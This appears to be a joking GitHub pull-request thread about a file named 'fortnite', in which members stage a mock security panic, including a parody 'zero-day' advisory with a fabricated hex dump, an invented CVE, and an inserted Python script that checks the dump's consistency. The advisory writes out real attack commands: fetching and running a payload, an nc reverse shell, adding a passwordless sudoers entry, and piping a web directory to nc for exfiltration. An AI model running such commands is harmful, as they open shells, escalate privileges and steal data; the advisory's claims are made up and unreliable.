
Rework fortnite #141

Merged
merged 3 commits into from
May 20, 2024

Conversation

bruhwhyamisobad (Contributor)

No description provided.

3kh0 commented May 9, 2024

SAVE FORTNIGHT

rifting (Member) commented May 9, 2024

This makes the build fail, and it's outside of the project scope. Do you even use the software?

@rifting rifting closed this May 9, 2024
e9x (Member) commented May 9, 2024

+1, This can't be merged.

@kxtzownsu

tried running this commit and my entire firmware got nuked, did you even test this?

e9x (Member) commented May 18, 2024

I think we can meet somewhere in the middle. I have a proposed solution that will allow builds to continue working, while adding more features to the fortnite file. Here's my proposed replacement for the fortnite file:
fortnite

@e9x e9x reopened this May 18, 2024
@e9x e9x requested review from e9x and rifting May 18, 2024 02:28
@e9x e9x added the enhancement New feature or request label May 18, 2024
@e9x e9x changed the title Delete fortnite Rework fortnite May 18, 2024
ProgrammerIn-wonderland (Member)

I believe this file is malicious and contains a backdoor Trojan horse known as an "IP logger", it can grab your discord token

e9x (Member) commented May 18, 2024

I believe this file is malicious and contains a backdoor Trojan horse known as an "IP logger", it can grab your discord token

Are you sure your workstation wasn't compromised? Can you provide checksums of the file?

https://www.virustotal.com/gui/file/139b7ab67d05dd75bc40a39f05d46cd04ed3ba188fcae872a4a3b1d432c349cd/detection

3kh0 commented May 20, 2024

I believe this file is malicious and contains a backdoor Trojan horse known as an "IP logger", it can grab your discord token

Are you sure your workstation wasn't compromised? Can you provide checksums of the file?

https://www.virustotal.com/gui/file/139b7ab67d05dd75bc40a39f05d46cd04ed3ba188fcae872a4a3b1d432c349cd/detection

Cool but it is entirely possible that this file is exploiting a zero-day. Additional testing is required

@builtbyvys

Security Alert: Zero-Day Exploit Detected in 'fortnite'

Overview

The Percury Mercshopians have identified a critical zero-day exploit embedded in a file named 'fortnite'. This malicious file is capable of executing unauthorized remote code, compromising sensitive data, and propagating across networked systems undetected. The exploit leverages sophisticated obfuscation techniques, making it exceptionally difficult to detect and mitigate using standard antivirus solutions.

Technical Analysis

The 'fortnite' file exhibits behavior characteristic of advanced persistent threats (APT), including but not limited to memory corruption, buffer overflow attacks, and privilege escalation. Initial analysis indicates that the file is programmed to establish a covert command and control (C&C) channel with external servers, allowing attackers to issue commands and exfiltrate data.

Below are excerpts from the octet dump and relevant commands observed during the reverse engineering process:

Octet Dump
0000: 46 4f 52 54 4e 49 54 45 20 4d 41 4c 49 43 49 4f | FORTNITE MALICIO
0010: 55 53 20 46 49 4c 45 20 2d 20 5a 45 52 4f 2d 44 | US FILE - ZERO-D
0020: 41 59 20 45 58 50 4c 4f 49 54 00 90 4e 3b 6f 21 | AY EXPLOIT..N;o!
0030: 8f 33 01 67 44 89 3a c0 47 5a 99 45 f0 c3 33 12 | .3.gD.:.GZ.E..3.
0040: 41 23 59 74 7b a4 f3 56 9a d3 78 43 c5 87 e1 98 | A#Yt{..V..xC....
0050: 9f 34 21 67 8b e0 77 44 2c 90 5e 11 4a 34 6d 22 | .4!g..wD,^J4m"
0060: 39 b4 5a 23 11 4d 59 98 4f 32 90 f5 21 48 77 69 | 9.Z#.MY.O2..!Hwi
Observed Commands
  • Initial Payload Deployment:

    wget https://store.epicgames.com/en-US/p/fortnite/payload -O /tmp/.fortnite_payload
    chmod +x /tmp/.fortnite_payload
    /tmp/.fortnite_payload &
  • Establishing C&C Communication:

    nc -e /bin/bash fortnite.local 4444
  • Privilege Escalation:

    echo "fortnite ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
    sudo -u fortnite /bin/bash
  • Data Exfiltration:

    tar czf - /var/www/html | nc fortnite.local 5555

Mitigation Steps

  1. Immediate Isolation: Disconnect the affected systems from the network to prevent further spread.
  2. File Removal: Manually delete the 'fortnite' file and any associated payloads:
    rm -f /tmp/.fortnite_payload
    rm -f /path/to/fortnite
  3. Network Monitoring: Deploy enhanced network monitoring to detect any attempts to re-establish C&C communication.
  4. Patch Deployment: Apply all relevant security patches and updates to prevent re-exploitation.
  5. System Audit: Conduct a thorough system audit to identify and remediate any unauthorized changes or data breaches.

Conclusion

The 'fortnite' zero-day exploit represents a significant threat to organizational security. Immediate and comprehensive response measures are essential to mitigate the impact and secure network integrity. Continued vigilance and proactive security practices are recommended to defend against such advanced threats.

For further assistance and detailed incident response, please contact our cybersecurity team at security@percurymerc.shop
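Two replies in this thread ask for checksums and for "additional testing" before a pasted artifact is trusted. The one check a reviewer can run entirely offline on a posted octet dump is whether the dump is internally consistent: does the ASCII column really render the hex column, and are the offsets contiguous? The script below is an added example for this thread, not code from the repository or from any commenter. It assumes the xxd-style "offset: hex bytes | ascii" layout used in the post above, and its sample input is that dump copied verbatim; the function names (`parse_dump`, `check_dump`, `dump_bytes`) are my own.

```python
"""Consistency checker for xxd-style hex dumps pasted into bug reports.

Added example for this thread (not project code). Assumes each row looks
like '<hex offset>: <hex bytes separated by spaces> | <ascii rendering>'.
"""
import re

# One dump row: offset, then hex byte pairs, then '|' and the ASCII column.
LINE_RE = re.compile(
    r"^([0-9a-fA-F]+):\s+((?:[0-9a-fA-F]{2}\s+)*[0-9a-fA-F]{2})\s*\|\s?(.*)$"
)

# Constructed sample input: the octet dump from the post above, copied as posted.
SAMPLE_DUMP = """\
0000: 46 4f 52 54 4e 49 54 45 20 4d 41 4c 49 43 49 4f | FORTNITE MALICIO
0010: 55 53 20 46 49 4c 45 20 2d 20 5a 45 52 4f 2d 44 | US FILE - ZERO-D
0020: 41 59 20 45 58 50 4c 4f 49 54 00 90 4e 3b 6f 21 | AY EXPLOIT..N;o!
0030: 8f 33 01 67 44 89 3a c0 47 5a 99 45 f0 c3 33 12 | .3.gD.:.GZ.E..3.
0040: 41 23 59 74 7b a4 f3 56 9a d3 78 43 c5 87 e1 98 | A#Yt{..V..xC....
0050: 9f 34 21 67 8b e0 77 44 2c 90 5e 11 4a 34 6d 22 | .4!g..wD,^J4m"
0060: 39 b4 5a 23 11 4d 59 98 4f 32 90 f5 21 48 77 69 | 9.Z#.MY.O2..!Hwi
"""


def printable(b: int) -> str:
    """Render one byte the way xxd does: printable ASCII as-is, else '.'."""
    return chr(b) if 0x20 <= b < 0x7F else "."


def parse_dump(text: str):
    """Parse dump rows into (offset, bytes, ascii_column) tuples."""
    rows = []
    for line in text.splitlines():
        line = line.lstrip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unparseable dump row: {line!r}")
        offset = int(m.group(1), 16)
        data = bytes.fromhex(m.group(2).replace(" ", ""))
        rows.append((offset, data, m.group(3)))
    return rows


def dump_bytes(text: str) -> bytes:
    """Concatenate the hex column of every row into one byte string."""
    return b"".join(data for _, data, _ in parse_dump(text))


def check_dump(text: str):
    """Return a list of (offset, problem) pairs; an empty list means the dump
    is self-consistent. Two checks: offsets must be contiguous, and the ASCII
    column must equal the rendering of the hex column, byte for byte."""
    problems = []
    expected = None
    for offset, data, ascii_col in parse_dump(text):
        if expected is not None and offset != expected:
            problems.append((offset, f"offset gap: expected {expected:#06x}"))
        expected = offset + len(data)
        rendered = "".join(printable(b) for b in data)
        if rendered != ascii_col:
            problems.append(
                (offset, f"ascii column {ascii_col!r} does not match hex column {rendered!r}")
            )
    return problems


if __name__ == "__main__":
    found = check_dump(SAMPLE_DUMP)
    print(f"{len(dump_bytes(SAMPLE_DUMP))} bytes in dump, {len(found)} problem(s)")
    for off, why in found:
        print(f"  {off:#06x}: {why}")
```

Run against the dump as posted, the checker reports a single inconsistent row at offset 0x50: the hex column has 16 bytes but the ASCII column has only 14 characters (the dots for 0x90 and 0x11 are missing). A row that does not round-trip is the sort of detail an analyst verifies before treating a pasted dump as evidence of anything.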

3kh0 commented May 20, 2024

@builtbyvys Thank you for this; I have forwarded this to the people at Mitre to get a CVE made for it. Will update on the status of this.

image

@e9x e9x added the URGENT label May 20, 2024
Cattn commented May 20, 2024

Looking into this...

@e9x e9x self-assigned this May 20, 2024
rifting (Member) left a comment

Please remove the IP logger and discord token stealer before I can proceed with reviewing the pull request

e9x (Member) commented May 20, 2024

CC: @skibiditoilet510

Co-authored-by: skibiditoilet510 <167944814+skibiditoilet510@users.noreply.github.com>
e9x (Member) commented May 20, 2024

Please review @Riftriot @ProgrammerIn-wonderland

e9x (Member) left a comment

Malware fixed

rifting (Member) left a comment

After a close examination of the file, it is shown that fortnite.jpg is vulnerable to the Colonthree CVE. Please update it as it is patched in the latest versions
image

@e9x e9x merged commit 1b2359f into titaniumnetwork-dev:main May 20, 2024
3kh0 commented May 21, 2024

@Riftriot will have to work on fixing this in a future pull, I would be happy to help out

Cattn commented May 21, 2024

This is serious. This should be reverted immediately.

@proudparrot2

I am running it on my machine now, and see almost every unit test is failing. Did you even run them before merging this pull request?

rifting (Member) commented May 21, 2024

Hey everyone, after reviewing the Colonthree CVE, I believe it's important to maintain a balanced perspective. While every vulnerability should be addressed, it's crucial not to inflate the severity beyond its actual impact. In this case, the exploit's scope seems limited, and with proper mitigation strategies in place, the risk can be effectively managed. Let's focus on constructive solutions rather than unnecessary panic. 💻🔒 #cybersecurity #github #CVE

@proudparrot2

This is not unnecessary panic. This is a case of a reckless contributor who merged a pull request that makes the majority of unit tests fail, as well as the build. Please consider your priorities when replying with comments such as these.

Cattn commented May 21, 2024

Hey everyone, after reviewing the Colonthree CVE, I believe it's important to maintain a balanced perspective. While every vulnerability should be addressed, it's crucial not to inflate the severity beyond its actual impact. In this case, the exploit's scope seems limited, and with proper mitigation strategies in place, the risk can be effectively managed. Let's focus on constructive solutions rather than unnecessary panic. 💻🔒 #cybersecurity #github #CVE

This careless and baseless sentiment will not be tolerated here. Delete this comment now, and stop downplaying serious threats. This is life ending.

3kh0 commented May 21, 2024

image

rifting (Member) commented May 21, 2024

Hey proudparrot2 and Cattn, I appreciate your feedback and understand the concerns you're raising. My intention wasn't to downplay the severity of the issue but to emphasize the importance of measured responses. Every vulnerability, including the Colonthree CVE, deserves our full attention and swift action to mitigate risks effectively.

However, I believe that creating a sense of balance and not causing unnecessary panic is crucial for our collective progress. We need to address the CVE with the urgency it demands while also providing clear, constructive solutions and ensuring our community remains calm and focused.

Let's work together to fix the build and unit test failures as a priority and develop a robust plan to prevent similar issues in the future. Collaboration and clear communication will help us navigate this challenge more effectively. 💻🔒 #cybersecurity #github #CVE

Cattn commented May 21, 2024 via email

e9x (Member) commented May 22, 2024

"vely. 💻🔒 #cybersecurity #githu"

@Riftriot I see. For reference:

rifting (Member) commented May 23, 2024

e9x, we maintain a professional standard in this community, and your recent post is far from meeting it. Let's keep the discourse focused and respectful. Please refrain from such inappropriate content in the future. Let's work together to uphold the standards we expect from all members. 💻🔒 #cybersecurity #github #CVE

Labels: enhancement (New feature or request), URGENT

9 participants